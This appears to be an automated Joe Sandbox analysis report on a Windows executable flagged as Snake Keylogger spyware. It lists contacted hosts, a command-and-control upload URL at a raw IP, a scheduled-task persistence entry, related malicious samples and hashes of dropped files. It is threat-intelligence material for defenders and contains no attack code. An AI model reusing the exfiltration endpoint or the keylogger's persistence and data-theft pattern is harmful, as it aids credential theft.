                            http://www.fontbureau.com/designers83140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            132.226.8.169
                            checkip.dyndns.comUnited States
                            16989UTMEMUSfalse
                            149.154.167.220
                            api.telegram.orgUnited Kingdom
                            62041TELEGRAMRUtrue
                            45.143.99.52
                            quicklyserv.comTurkey
                            208485EKSENBILISIMTRtrue
                            188.114.97.3
                            reallyfreegeoip.orgEuropean Union
                            13335CLOUDFLARENETUStrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1522669
                            Start date and time:2024-09-30 15:02:06 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 10m 2s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:3140, EUR.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@23/15@4/4
                            EGA Information:
                            • Successful, ratio: 75%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 309
                            • Number of non-executed functions: 43
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target 3140, EUR.exe, PID 7180 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            TimeTypeDescription
                            09:02:57API Interceptor7765030x Sleep call for process: 3140, EUR.exe modified
                            09:03:02API Interceptor32x Sleep call for process: powershell.exe modified
                            09:03:04API Interceptor5365718x Sleep call for process: lkuPOyvaWlIu.exe modified
                            14:03:03Task SchedulerRun new task: lkuPOyvaWlIu path: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            132.226.8.1691727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                            • checkip.dyndns.org/
                            SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                            • checkip.dyndns.org/
                            58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • checkip.dyndns.org/
                            New Order.docGet hashmaliciousSnake KeyloggerBrowse
                            • checkip.dyndns.org/
                            new shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • checkip.dyndns.org/
                            update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                            • checkip.dyndns.org/
                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • checkip.dyndns.org/
                            GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                            • checkip.dyndns.org/
                            Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                            • checkip.dyndns.org/
                            #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • checkip.dyndns.org/
                            149.154.167.2201727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                              https://contact-us-business-help-home-64844114956.on-fleek.app/Get hashmaliciousUnknownBrowse
                                SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    0LpFv1haTA.exeGet hashmaliciousWhiteSnake Stealer, XenoRATBrowse
                                      0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                          GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                45.143.99.52Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  Swift E-Posta Bildirimi_2024-09-23_T11511900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                                      https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                                        https://dscoco.com/documentattached/secure.htmlGet hashmaliciousHTMLPhisherBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          reallyfreegeoip.orgItalya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.96.3
                                                          1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.97.3
                                                          SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.96.3
                                                          SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.97.3
                                                          New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.96.3
                                                          0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.96.3
                                                          update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.97.3
                                                          .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.96.3
                                                          quicklyserv.comZiraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 45.143.99.52
                                                          Swift E-Posta Bildirimi_2024-09-23_T11511900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 45.143.99.52
                                                          api.telegram.org1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          https://contact-us-business-help-home-64844114956.on-fleek.app/Get hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          0LpFv1haTA.exeGet hashmaliciousWhiteSnake Stealer, XenoRATBrowse
                                                          • 149.154.167.220
                                                          0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          checkip.dyndns.comItalya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 193.122.6.168
                                                          1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 132.226.8.169
                                                          SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                          • 193.122.130.0
                                                          SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 193.122.6.168
                                                          58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 193.122.130.0
                                                          New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                          • 193.122.130.0
                                                          0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 158.101.44.242
                                                          new shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 132.226.8.169
                                                          SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 193.122.130.0
                                                          update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 132.226.8.169
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TELEGRAMRUfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 149.154.167.99
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 149.154.167.99
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 149.154.167.99
                                                          1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 149.154.167.99
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 149.154.167.99
                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 149.154.167.99
                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 149.154.167.99
                                                          http://www.telegram-korea.com/Get hashmaliciousUnknownBrowse
                                                          • 149.154.167.99
                                                          http://www.35yc29h.xyz/Get hashmaliciousUnknownBrowse
                                                          • 149.154.167.99
                                                          CLOUDFLARENETUSfactura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                          • 172.67.216.244
                                                          http://email.app.loyalty.appstle.com/c/eJwczE2uLBEUAODVMHty6vgfGLxJ7YNCldsaadKJ3d_kbuCLDpJVWtPkDo1aHlqApo_j-QrGx0NGE5VRkkMwCbUEaa334GlxCCjAogErldDsyjIGyVXM-UCInAjwY7Dat69rMz_GXDWxq79pdc9aYxL-n-BJ8KylvUpjoXSC5_2T2iwlljsRPOnHhc--S1VIBHzvyVp-sdbpchGMyvkfJvbe8-mj5P2nfx3-BgAA__-UbkEqGet hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousGRQ ScamBrowse
                                                          • 104.21.27.6
                                                          https://techservealliance.orgGet hashmaliciousUnknownBrowse
                                                          • 104.18.142.119
                                                          SCAN_Client_No_XP9739270128398468932393.pdfGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.21.90.191
                                                          https://cganet.com/Get hashmaliciousUnknownBrowse
                                                          • 104.22.0.204
                                                          https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 104.21.1.169
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.129.166
                                                          https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          UTMEMUS1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 132.226.8.169
                                                          SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                          • 132.226.247.73
                                                          58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 132.226.247.73
                                                          New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                          • 132.226.8.169
                                                          0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 132.226.247.73
                                                          new shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 132.226.8.169
                                                          update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 132.226.8.169
                                                          GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 132.226.8.169
                                                          GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                          • 132.226.8.169
                                                          Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                          • 132.226.247.73
                                                          EKSENBILISIMTRZiraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 45.143.99.52
                                                          Swift E-Posta Bildirimi_2024-09-23_T11511900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 45.143.99.52
                                                          04cde81ac938706771fa9fe936ee8f79fe7e079973098.exeGet hashmaliciousRedLine, XmrigBrowse
                                                          • 45.133.36.107
                                                          fKQg0x6bbi.elfGet hashmaliciousMiraiBrowse
                                                          • 185.154.193.242
                                                          wwa0n141m0.elfGet hashmaliciousMiraiBrowse
                                                          • 185.154.193.242
                                                          HhTAZl7a4Y.elfGet hashmaliciousMiraiBrowse
                                                          • 185.154.193.242
                                                          C5zetLDDZz.elfGet hashmaliciousMiraiBrowse
                                                          • 185.154.193.242
                                                          boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 185.154.193.242
                                                          boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 185.154.193.242
                                                          https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                                          • 45.143.99.52
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          54328bd36c14bd82ddaa0c04b25ed9adItalya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.97.3
                                                          1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.97.3
                                                          SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.97.3
                                                          uvDYInLodR.exeGet hashmaliciousNjratBrowse
                                                          • 188.114.97.3
                                                          uvDYInLodR.exeGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          3nWKbZrQvF.exeGet hashmaliciousNjratBrowse
                                                          • 188.114.97.3
                                                          3nWKbZrQvF.exeGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.97.3
                                                          update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.97.3
                                                          .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.97.3
                                                          3b5074b1b5d032e5620f69f9f700ff0eUhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 149.154.167.220
                                                          7LC2izrr9u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 149.154.167.220
                                                          UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 149.154.167.220
                                                          mrKs8EKXbz.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 149.154.167.220
                                                          7LC2izrr9u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 149.154.167.220
                                                          https://metrics.send.hotmart.com/v2/events/click/64ec6af4-7b81-4abf-9e97-fe7d70d45255?d=1nFwG70sgZqlXEGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          Shipping documents 000029393994400000000000.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                          • 149.154.167.220
                                                          No context
                                                          Process:C:\Users\user\Desktop\3140, EUR.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1968
                                                          Entropy (8bit):5.345338934370444
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwRb
                                                          MD5:A6AE821E85EB04F10E67C9D65E129C47
                                                          SHA1:8B3295F40A2F7DCA294DE5502CFE6A751239DB2C
                                                          SHA-256:BD5DE47C737626F6A162CDFE9476DE310476B56FAF917092DF2D9CD4059A6A41
                                                          SHA-512:22E2404E8D989DC1F58B209B48A2BD0AFFA0E19B09100C3FD8417A8A23EBA109A36AF7031CAE33F8FF5BD798F01F81ACA129D90801B34A9607C2D62A63C643DD
                                                          Malicious:true
                                                          Reputation:moderate, very likely benign file
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                                                          Process:C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1968
                                                          Entropy (8bit):5.345338934370444
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwRb
                                                          MD5:A6AE821E85EB04F10E67C9D65E129C47
                                                          SHA1:8B3295F40A2F7DCA294DE5502CFE6A751239DB2C
                                                          SHA-256:BD5DE47C737626F6A162CDFE9476DE310476B56FAF917092DF2D9CD4059A6A41
                                                          SHA-512:22E2404E8D989DC1F58B209B48A2BD0AFFA0E19B09100C3FD8417A8A23EBA109A36AF7031CAE33F8FF5BD798F01F81ACA129D90801B34A9607C2D62A63C643DD
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):2232
                                                          Entropy (8bit):5.379401388151058
                                                          Encrypted:false
                                                          SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZSUyus:fLHxvIIwLgZ2KRHWLOugEs
                                                          MD5:E1EE0479D96955B1FB2CC31056370383
                                                          SHA1:34786077993793FCB28FA325740270F5F7F8723E
                                                          SHA-256:20C37B9D9110033848F4AB81E3A860C2B56E1DBBFFB2F361B2FBE9D47F91F967
                                                          SHA-512:91C99CA6000309B28FB7776512B6418F11EDDEC960DDC11FB05B758CD589D1BF1EE1E09C8C5648062F8D750FA211BF115CADF873FAFB810296AC480E60790C54
                                                          Malicious:false
                                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
